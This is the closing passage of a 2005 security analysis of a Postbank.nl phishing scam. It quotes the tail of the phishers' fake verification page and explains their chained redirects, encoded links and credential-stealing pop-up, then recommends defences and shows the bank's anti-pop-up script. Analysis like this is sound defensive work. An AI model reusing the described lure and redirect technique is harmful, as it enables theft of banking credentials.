<head>
<title>Your E-Mail Was Verified.</title>
</head>
<body>
<center>
<font size=3 color=red>
<br><br><br><br><b>Thank you.
</font>
<font size=3>
</b><br><br><b>Your E-Mail Address Was<br>Successful Verified.</b><br>
</font>
</center>
</body>
</html>
Ahh.. Doesn't that give you a safe feeling?
Conclusion:
In this analysis I looked at the technical side of one specific phishing scam: the Postbank.nl scam. I was more interested in knowing how the scammers did the trick than in who did it. Also, I don't have the resources to track down the scammers. Because of their use of free services and a lot of redirects, I'm afraid it's really hard to track them down. We've seen many international references: the e-mail was sent from Tampa Bay, Florida, USA, with an Italian sender name, the JavaScript used Spanish function names, the Google redirect used the Spanish Google domain and all the free URL forwarders were Russia-based companies.
What we've seen is basically just the good old social engineering trick in combination with several techniques to trick victims into clicking. It began with an e-mail asking the recipient to verify his/her e-mail address by clicking on the link below. The link had two in-link redirects, from Google to MSN and then finally to a free .RU address. From that .RU address the victim was sent to another free .RU address where a pop-up was spawned asking the victim for his/her credentials while the Postbank.nl website was displayed in the background. All in all this looks very authentic to the average user. The only thing that could lead to suspicion is the fact that the e-mail was written in English while Postbank is a Dutch bank.
One thing I found interesting was the fact that the victim was redirected so many times. The link in the e-mail seemed like a decent link, pointing to Postbank.nl, while in fact the href attribute pointed somewhere else. But the value of the href attribute was still not really suspicious: a link containing Google, MSN and some 'strange code' can't be that wrong, can it?
We've also seen two uses of obfuscation: first the %-hex-encoded URL in the e-mail, and second the entity-encoded HTML which triggered the CGI scripts that sent the victim's credentials somewhere else.
The one thing that still boggles my mind is why the stylesheet in the popup is included from an external site over an HTTPS connection, while the styling rules within the stylesheet aren't used! I still think it's done to trick the user into thinking he's entering his/her credentials in a secured form, but I don't have any evidence of this. I tested it on the latest Firefox and the latest Internet Explorer, but both browsers considered the pages non-secure.
Two days after I received the e-mail, the scam is still working, albeit slightly differently: the redirects have changed. Most probably some of the redirects went down after abuse complaints.
Is Postbank to blame for this scam? Partially, yes, I think. Security mistake number one is of course their outdated way of logging in to e-banking. A username and password are sufficient to view an account balance. TAN codes are enough to make transactions. Postbank should follow the other banks in The Netherlands and start using a digital token (random reader) to authenticate their clients.
Secondly, although they've posted a warning against phishing on their front page, I don't think it's visible enough. In red letters the warning reads "Belangrijk bericht als u Mijn Postbank.nl of Girotel Online heeft", translated: "Important message for Mijn Postbank.nl or Girotel Online users". Why not whitelist referers? If a user visits the Postbank.nl page from an unknown referer, add some extra warning such as a pop-up window. Yes, I know a lot of people are using pop-up blocking software, but if that's the case they wouldn't have seen the 'Enter your credentials' pop-up in the first place. Then have some people verify unknown referrals and whitelist or blacklist them.
Hopefully people and companies are becoming more aware of the dangers of phishing through media attention. There are still a lot of things companies can do to limit the chance of abuse. One initiative I've also been thinking about, and which really is a big step in the right direction, is Netcraft's anti-phishing plug-in for Firefox: using blacklists, users are warned when they arrive on a phishing website.
Well, this is it. I hope you found this analysis interesting. If you have any questions or comments please drop me an e-mail at rastakid [at] syn-ack [dot] org.
Update 7 June 2005:
I'm glad to have received a lot of positive feedback on my analysis and would like to thank everyone for their interest. Special thanks go out to Moritz Naumann and Frans E. for their explanation of the SORBS list. I didn't know it was a special SpamAssassin rule added by my ISP Wanadoo. After releasing this analysis I forwarded it to Infobox.ru where the CGI scripts were hosted and they immediately closed the accounts. Kudos to Infobox.ru, I wish more companies were as active as they are. I encourage anyone who finds more free URL redirects used by scammers to contact the appropriate abuse desks to close the phishing sites as quickly as possible.
But the big news is that Postbank has taken active measures against this particular scam: they included anti-pop-up code in their website (http://www.postbank.nl/). Here's the code:
<script language="javascript" type="text/javascript">
var phisher = window.open('', 'myqos9', 'height=1, width=1, left=0, top=0,resizable=no,scrollbars=no,toolbar=no,status=no');
if (phisher.location && !phisher.closed) {
phisher.close();
}
</script>
What this does is open a new window (pop-up) with the same name as the one the phishers used and then immediately close it. This is very effective, but what if the scammers change the name from 'myqos9' to something else? Anyway, this is really good work from Postbank. Now if only they would get rid of those TAN codes...
(C) Vincent 'rastakid' van Scherpenseel - SYN-ACK.org - 6 June 2005
You're allowed to distribute, edit, use for education or do whatever with this papers as long as the credits to the original author remain visible.